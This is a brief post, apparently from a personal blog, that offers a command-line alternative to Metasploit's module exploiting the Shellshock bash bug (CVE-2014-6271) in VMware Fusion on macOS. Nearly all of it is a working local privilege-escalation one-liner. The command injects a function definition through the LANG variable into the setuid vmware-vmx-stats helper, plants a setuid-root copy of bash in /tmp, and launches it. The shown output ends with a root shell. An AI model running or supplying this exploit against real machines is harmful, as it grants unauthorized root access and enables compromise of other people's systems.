Just wanted to post a quick alternative of Metasploit’s VMWare Fusion CVE-2014-6271 exploit ( metasploit-framework / modules / exploits / osx / local / vmware_bash_function_root.rb ) for local shell use.

hephaestus:~ jdugie$ for cmd in "cp /bin/bash /tmp/" "chmod 4755 /tmp/bash"; do LANG='() { :;}; '${cmd} /Applications/VMware\ Fusion.app/Contents/Library/vmware-vmx-stats /dev/random; done; echo; /tmp/bash -p;
2014-09-25T20:38:25.964| ServiceImpl_Opener: PID 17903
2014-09-25T20:38:27.473| ServiceImpl_Opener: PID 17926

bash-3.2# whoami
root